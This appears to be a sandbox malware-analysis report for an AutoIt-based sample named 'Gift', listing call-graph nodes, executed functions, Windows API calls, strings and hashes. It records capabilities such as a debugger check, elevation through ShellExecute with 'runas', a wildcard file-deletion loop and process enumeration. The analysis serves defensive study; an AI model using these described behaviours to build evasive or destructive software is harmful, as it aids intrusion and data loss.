100727 2d63de 100725->100727 100725->100729 100726->100704 100726->100705 100726->100707 100726->100708 100726->100710 100726->100715 100726->100717 100726->100721 100726->100723 100726->100724 100726->100729 100726->100760 100775 337f11 59 API calls Mailbox 100726->100775 100776 326cf1 59 API calls Mailbox 100726->100776 100730 30e172 100727->100730 100731 2d6413 100727->100731 100781 33a48d 89 API calls 4 library calls 100729->100781 100773 34c87c 85 API calls 2 library calls 100730->100773 100731->100734 100762 2d5447 Mailbox 100731->100762 100774 34c9c9 95 API calls Mailbox 100734->100774 100736->100714 100736->100729 100752 30e2e9 VariantClear 100736->100752 100736->100760 100765 34e60c 130 API calls 100736->100765 100766 345e1d 95 API calls 100736->100766 100767 2dcfd7 98 API calls 100736->100767 100768 34ec68 92 API calls 100736->100768 100769 34ebba 86 API calls 100736->100769 100770 2d5190 59 API calls Mailbox 100736->100770 100777 327aad 59 API calls 100736->100777 100737 30e19d 100737->100737 100738 30e691 100778 33a48d 89 API calls 4 library calls 100738->100778 100739 30f165 100786 33a48d 89 API calls 4 library calls 100739->100786 100743 2d6e30 60 API calls 100743->100762 100744 30e6a0 100745 2e1c9c 59 API calls 100745->100762 100746 2d69fa 100748 2e1c9c 59 API calls 100746->100748 100747 2f0fe6 59 API calls Mailbox 100747->100762 100748->100760 100750 2d69ff 100750->100738 100750->100739 100751 30ea9a 100755 2e1c9c 59 API calls 100751->100755 100752->100736 100753 2e1207 59 API calls 100753->100762 100754 2d7e50 277 API calls 100754->100762 100755->100760 100756 30eb67 100756->100760 100779 327aad 59 API calls 100756->100779 100757 327aad 59 API calls 100757->100762 100758 2f2f70 67 API calls __cinit 100758->100762 100761 30ef28 100780 33a48d 89 API calls 4 library calls 100761->100780 100762->100738 100762->100743 100762->100745 100762->100746 100762->100747 100762->100750 100762->100751 100762->100753 100762->100754 100762->100756 100762->100757 100762->100758 100762->100760 100762->100761 100764 2d5a1a 100762->100764 100785 33a48d 89 API calls 4 library calls 100764->100785 100765->100736 100766->100736 100767->100736 100768->100736 100769->100736 100770->100736 100771->100729 100772->100722 100773->100734 100774->100737 100775->100726 100776->100726 100777->100736 100778->100744 100779->100760 100780->100764 100781->100714 100782->100760 100783->100714 100784->100714 100785->100760 100786->100760 100787 2d7357 100788 2d7360 100787->100788 100789 2d78f5 100787->100789 100788->100789 100790 2d4d37 84 API calls 100788->100790 100797 2d6fdb Mailbox 100789->100797 100798 3287f9 59 API calls _memmove 100789->100798 100791 2d738b 100790->100791 100791->100789 100793 2d739b 100791->100793 100794 2e1680 59 API calls 100793->100794 100794->100797 100795 30f91b 100796 2e1c9c 59 API calls 100795->100796 100796->100797 100798->100795 100799 2d1016 100804 2e5ce7 100799->100804 100802 2f2f70 __cinit 67 API calls 100803 2d1025 100802->100803 100805 2f0fe6 Mailbox 59 API calls 100804->100805 100806 2e5cef 100805->100806 100807 2d101b 100806->100807 100811 2e5f39 100806->100811 100807->100802 100812 2e5f42 100811->100812 100814 2e5cfb 100811->100814 100813 2f2f70 __cinit 67 API calls 100812->100813 100813->100814 100815 2e5d13 100814->100815 100816 2e1207 59 API calls 100815->100816 100817 2e5d2b GetVersionExW 100816->100817 100818 2e1821 59 API calls 100817->100818 100819 2e5d6e 100818->100819 100820 2e1981 59 API calls 100819->100820 100831 2e5d9b 100819->100831 100821 2e5d8f 100820->100821 100822 2e133d 59 API calls 100821->100822 100822->100831 100823 2e5e00 GetCurrentProcess IsWow64Process 100824 2e5e19 100823->100824 100826 2e5e2f 100824->100826 100827 2e5e98 GetSystemInfo 100824->100827 100825 321098 100839 2e55f0 100826->100839 100828 2e5e65 100827->100828 100828->100807 100831->100823 100831->100825 100832 2e5e8c GetSystemInfo 100834 2e5e56 100832->100834 100833 2e5e41 100835 2e55f0 2 API calls 100833->100835 100834->100828 100836 2e5e5c FreeLibrary 100834->100836 100837 2e5e49 GetNativeSystemInfo 100835->100837 100836->100828 100837->100834 100840 2e5619 100839->100840 100841 2e55f9 LoadLibraryA 100839->100841 100840->100832 100840->100833 100841->100840 100842 2e560a GetProcAddress 100841->100842 100842->100840 100843 3392c8 100844 3392d5 100843->100844 100845 3392db 100843->100845 100846 2f2f85 _free 58 API calls 100844->100846 100847 2f2f85 _free 58 API calls 100845->100847 100848 3392ec 100845->100848 100846->100845 100847->100848 100849 2f2f85 _free 58 API calls 100848->100849 100850 3392fe 100848->100850 100849->100850

                                                                          Executed Functions

                                                                          Function 002E5240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147windowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002E526C
                                                                          • IsDebuggerPresent.KERNEL32 ref: 002E527E
                                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 002E52E6
                                                                            • Part of subcall function 002E1821: _memmove.LIBCMT ref: 002E185B
                                                                            • Part of subcall function 002DBBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 002DBC07
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 002E5366
                                                                          • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00320B2E
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00320B66
                                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00386D10), ref: 00320BE9
                                                                          • ShellExecuteW.SHELL32(00000000), ref: 00320BF0
                                                                            • Part of subcall function 002E514C: GetSysColorBrush.USER32(0000000F), ref: 002E5156
                                                                            • Part of subcall function 002E514C: LoadCursorW.USER32(00000000,00007F00), ref: 002E5165
                                                                            • Part of subcall function 002E514C: LoadIconW.USER32(00000063), ref: 002E517C
                                                                            • Part of subcall function 002E514C: LoadIconW.USER32(000000A4), ref: 002E518E
                                                                            • Part of subcall function 002E514C: LoadIconW.USER32(000000A2), ref: 002E51A0
                                                                            • Part of subcall function 002E514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 002E51C6
                                                                            • Part of subcall function 002E514C: RegisterClassExW.USER32(?), ref: 002E521C
                                                                            • Part of subcall function 002E50DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002E5109
                                                                            • Part of subcall function 002E50DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 002E512A
                                                                            • Part of subcall function 002E50DB: ShowWindow.USER32(00000000), ref: 002E513E
                                                                            • Part of subcall function 002E50DB: ShowWindow.USER32(00000000), ref: 002E5147
                                                                            • Part of subcall function 002E59D3: _memset.LIBCMT ref: 002E59F9
                                                                            • Part of subcall function 002E59D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 002E5A9E
                                                                          Strings
                                                                          • runas, xrefs: 00320BE4
                                                                          • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00320B28
                                                                          • AutoIt, xrefs: 00320B23
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                          • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                          • API String ID: 529118366-2030392706
                                                                          • Opcode ID: 26604b693f789dbd8b8d5e23dfbbe1706b49a099ebef9434f0b7feeb921b2f13
                                                                          • Instruction ID: c1e21128c536d859c954660e2174484311f860b3871a081834e2a65f79436ff5
                                                                          • Opcode Fuzzy Hash: 26604b693f789dbd8b8d5e23dfbbe1706b49a099ebef9434f0b7feeb921b2f13
                                                                          • Instruction Fuzzy Hash: 525139309B4288AACF17EBB1DC16DFE7B7CAF05344F5044A6F591621A2CBB15925CF20
                                                                          Function 002E5D13 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1084 2e5d13-2e5d73 call 2e1207 GetVersionExW call 2e1821 1089 2e5e78-2e5e7a 1084->1089 1090 2e5d79 1084->1090 1091 320fa9-320fb5 1089->1091 1092 2e5d7c-2e5d81 1090->1092 1093 320fb6-320fba 1091->1093 1094 2e5e7f-2e5e80 1092->1094 1095 2e5d87 1092->1095 1097 320fbc 1093->1097 1098 320fbd-320fc9 1093->1098 1096 2e5d88-2e5dbf call 2e1981 call 2e133d 1094->1096 1095->1096 1106 321098-32109b 1096->1106 1107 2e5dc5-2e5dc6 1096->1107 1097->1098 1098->1093 1099 320fcb-320fd0 1098->1099 1099->1092 1101 320fd6-320fdd 1099->1101 1101->1091 1103 320fdf 1101->1103 1108 320fe4-320fea 1103->1108 1110 3210b4-3210b8 1106->1110 1111 32109d 1106->1111 1112 2e5dcc-2e5dcf 1107->1112 1113 320fef-320ffa 1107->1113 1109 2e5e00-2e5e17 GetCurrentProcess IsWow64Process 1108->1109 1118 2e5e1c-2e5e2d 1109->1118 1119 2e5e19 1109->1119 1120 3210a3-3210ac 1110->1120 1121 3210ba-3210c3 1110->1121 1116 3210a0 1111->1116 1112->1109 1117 2e5dd1-2e5def 1112->1117 1114 321017-321019 1113->1114 1115 320ffc-321002 1113->1115 1125 32101b-321027 1114->1125 1126 32103c-32103f 1114->1126 1122 321004-321007 1115->1122 1123 32100c-321012 1115->1123 1116->1120 1117->1109 1124 2e5df1-2e5df7 1117->1124 1128 2e5e2f-2e5e3f call 2e55f0 1118->1128 1129 2e5e98-2e5ea2 GetSystemInfo 1118->1129 1119->1118 1120->1110 1121->1116 1127 3210c5-3210c8 1121->1127 1122->1109 1123->1109 1124->1108 1130 2e5dfd 1124->1130 1131 321031-321037 1125->1131 1132 321029-32102c 1125->1132 1134 321041-321050 1126->1134 1135 321065-321068 1126->1135 1127->1120 1141 2e5e8c-2e5e96 GetSystemInfo 1128->1141 1142 2e5e41-2e5e4e call 2e55f0 1128->1142 1133 2e5e65-2e5e75 1129->1133 1130->1109 1131->1109 1132->1109 1137 321052-321055 1134->1137 1138 32105a-321060 1134->1138 1135->1109 1140 32106e-321083 1135->1140 1137->1109 1138->1109 1143 321085-321088 1140->1143 1144 32108d-321093 1140->1144 1145 2e5e56-2e5e5a 1141->1145 1149 2e5e85-2e5e8a 1142->1149 1150 2e5e50-2e5e54 GetNativeSystemInfo 1142->1150 1143->1109 1144->1109 1145->1133 1147 2e5e5c-2e5e5f FreeLibrary 1145->1147 1147->1133 1149->1150 1150->1145
                                                                          APIs
                                                                          • GetVersionExW.KERNEL32(?), ref: 002E5D40
                                                                            • Part of subcall function 002E1821: _memmove.LIBCMT ref: 002E185B
                                                                          • GetCurrentProcess.KERNEL32(?,00360A18,00000000,00000000,?), ref: 002E5E07
                                                                          • IsWow64Process.KERNEL32(00000000), ref: 002E5E0E
                                                                          • GetNativeSystemInfo.KERNEL32(00000000), ref: 002E5E54
                                                                          • FreeLibrary.KERNEL32(00000000), ref: 002E5E5F
                                                                          • GetSystemInfo.KERNEL32(00000000), ref: 002E5E90
                                                                          • GetSystemInfo.KERNEL32(00000000), ref: 002E5E9C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                          • String ID:
                                                                          • API String ID: 1986165174-0
                                                                          • Opcode ID: 839e695e6b2400138b1590df7f766c072828ae3e3dc83e046ff0a4ab0decb38e
                                                                          • Instruction ID: de623836889b15d74890c1c39fc23c1f4d8baae15398e1cbe107bc9bd22c7054
                                                                          • Opcode Fuzzy Hash: 839e695e6b2400138b1590df7f766c072828ae3e3dc83e046ff0a4ab0decb38e
                                                                          • Instruction Fuzzy Hash: 5D91E5315A9BD0DEC732CB7995510ABFFE56F3A304BC84A9ED0C793A01D230A658C769
                                                                          Function 00334005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1192 334005-33404c call 2e1207 * 3 call 2f0284 call 334fec 1203 33404e-334057 call 2e1900 1192->1203 1204 33405c-33408d call 2f0119 FindFirstFileW 1192->1204 1203->1204 1208 33408f-334091 1204->1208 1209 3340fc-334103 FindClose 1204->1209 1208->1209 1211 334093-334098 1208->1211 1210 334107-334129 call 2e1cb6 * 3 1209->1210 1213 3340d7-3340e9 FindNextFileW 1211->1213 1214 33409a-3340d5 call 2e1c9c call 2e17e0 call 2e1900 DeleteFileW 1211->1214 1213->1208 1215 3340eb-3340f1 1213->1215 1214->1213 1227 3340f3-3340fa FindClose 1214->1227 1215->1208 1227->1210
                                                                          APIs
                                                                            • Part of subcall function 002F0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002E2A58,?,00008000), ref: 002F02A4
                                                                            • Part of subcall function 00334FEC: GetFileAttributesW.KERNEL32(?,00333BFE), ref: 00334FED
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0033407C
                                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 003340CC
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 003340DD
                                                                          • FindClose.KERNEL32(00000000), ref: 003340F4
                                                                          • FindClose.KERNEL32(00000000), ref: 003340FD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                          • String ID: \*.*
                                                                          • API String ID: 2649000838-1173974218
                                                                          • Opcode ID: 328d56a81c331c046fbd2e138a6e7e1bf7f5a15b05bf4f5e0c5ed8f1afa2596e
                                                                          • Instruction ID: feb5955faf8e636bf25ed278e4ac67ad5ff2e4f65b9532b2d636ee07aa05fabd
                                                                          • Opcode Fuzzy Hash: 328d56a81c331c046fbd2e138a6e7e1bf7f5a15b05bf4f5e0c5ed8f1afa2596e
                                                                          • Instruction Fuzzy Hash: 743165310583859BC706EF60C8959AFB7ECBE55304F444E2DF5E582192DB70E929CB53
                                                                          Function 00334148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0033416D
                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0033417B
                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 0033419B
                                                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 00334245
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                                          • String ID:
                                                                          • API String ID: 3243318325-0
                                                                          • Opcode ID: 908dabbe8a3868d31b8d4afeabffa0f6645e73f442f9cc134cec80388c213e93
                                                                          • Instruction ID: 5da27b4d03f2bf9b88a7cc7e771f5c0ae0c5574244e8db85f3f08e57f5c56d8e
                                                                          • Opcode Fuzzy Hash: 908dabbe8a3868d31b8d4afeabffa0f6645e73f442f9cc134cec80388c213e93
                                                                          • Instruction Fuzzy Hash: 7931E3711083419FD306EF51D8C5AAFBBE8BF95340F50092DF585D21A1EBB0AA59CB92
                                                                          Function 002DB020 Relevance: 5.6, APIs: 3, Instructions: 1146COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002E3740: CharUpperBuffW.USER32(?,003971DC,00000000,?,00000000,003971DC,?,002D53A5,?,?,?,?), ref: 002E375D
                                                                          • _memmove.LIBCMT ref: 002DB68A
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharUpper_memmove
                                                                          • String ID:
                                                                          • API String ID: 2819905725-0
                                                                          • Opcode ID: 4b6af3ba10534102b7ca2932eb89ebb6a3ebd2d95df185e3411c5eef1acfe58e
                                                                          • Instruction ID: bce4b1d80c77a9a0e43981cefeecb87e31d8fd5e8dcc90d5cc63494a44e6af7b
                                                                          • Opcode Fuzzy Hash: 4b6af3ba10534102b7ca2932eb89ebb6a3ebd2d95df185e3411c5eef1acfe58e
                                                                          • Instruction Fuzzy Hash: F4A2BA70628341CFD726DF14C490B6AB7E1BF89304F16896EE89A8B351D770ED95CB82
                                                                          Function 0033494A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesW.KERNEL32(?,0031FC86), ref: 0033495A
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0033496B
                                                                          • FindClose.KERNEL32(00000000), ref: 0033497B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$AttributesCloseFirst
                                                                          • String ID:
                                                                          • API String ID: 48322524-0
                                                                          • Opcode ID: 920a54673cf934f64d8b6915deee6ba1551feecaf0adda7ab68699528b5b5b3f
                                                                          • Instruction ID: 37806b8426fb53ed668d8f605d592c677f52423b626678a2205bb2685e3e480a
                                                                          • Opcode Fuzzy Hash: 920a54673cf934f64d8b6915deee6ba1551feecaf0adda7ab68699528b5b5b3f
                                                                          • Instruction Fuzzy Hash: F6E0DF31810505AB82166B38EC8E8EB7B9C9F0733AF104B05F835C20E0EBB0A9448696
                                                                          Function 002D94E0 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0935903be2ee25fa572b20e43d0ea6d5f82179191ac0871b8d83211529ee7cac
                                                                          • Instruction ID: 1324a9fe017bd248cc81514c986e7e56d44d34fc5c05e725c21b55c72f4c44f2
                                                                          • Opcode Fuzzy Hash: 0935903be2ee25fa572b20e43d0ea6d5f82179191ac0871b8d83211529ee7cac
                                                                          • Instruction Fuzzy Hash: 8722AA74A2020ADFDB24DF54C490AAEB7B4FF09300F14816AE946AB341E771ADA1CB91
                                                                          Function 002DBC70 Relevance: 50.4, APIs: 22, Strings: 6, Instructions: 1379sleeptimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • timeGetTime.WINMM ref: 002DBF57
                                                                            • Part of subcall function 002D52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002D52E6
                                                                          • Sleep.KERNEL32(0000000A,?,?), ref: 003136B5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePeekSleepTimetime
                                                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                                          • API String ID: 1792118007-922114024
                                                                          • Opcode ID: 31eaa8091bb30480469ed4aa48a065bb577a52d9b29d56a18e5940eaad2f69a7
                                                                          • Instruction ID: b4e0d387d1bee527761d9823e85d46be15baf353123eac22a90d049226fe5eca
                                                                          • Opcode Fuzzy Hash: 31eaa8091bb30480469ed4aa48a065bb577a52d9b29d56a18e5940eaad2f69a7
                                                                          • Instruction Fuzzy Hash: 72C29F70618341DFD72ADF14C894BAAB7E5BF88304F15891EE48A97391CB71ED94CB82
                                                                          Function 002D33E8 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69windowregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 002D3444
                                                                          • RegisterClassExW.USER32(00000030), ref: 002D346E
                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002D347F
                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 002D349C
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002D34AC
                                                                          • LoadIconW.USER32(000000A9), ref: 002D34C2
                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002D34D1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                          • API String ID: 2914291525-1005189915
                                                                          • Opcode ID: 142e822a5fb7df11717d36ee61edebe083be3a06ede09e7989b073995ee5d1b2
                                                                          • Instruction ID: 59af350432cd0ee8c39bad18c0565a29849fdc103c9fc2c4961d3daf319f9f0a
                                                                          • Opcode Fuzzy Hash: 142e822a5fb7df11717d36ee61edebe083be3a06ede09e7989b073995ee5d1b2
                                                                          • Instruction Fuzzy Hash: F9314971858309EFDB529FA4DC8ABCABBF8FF09310F10855AE590A62A0D3B60541CF50
                                                                          Function 002D3411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 002D3444
                                                                          • RegisterClassExW.USER32(00000030), ref: 002D346E
                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002D347F
                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 002D349C
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002D34AC
                                                                          • LoadIconW.USER32(000000A9), ref: 002D34C2
                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002D34D1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
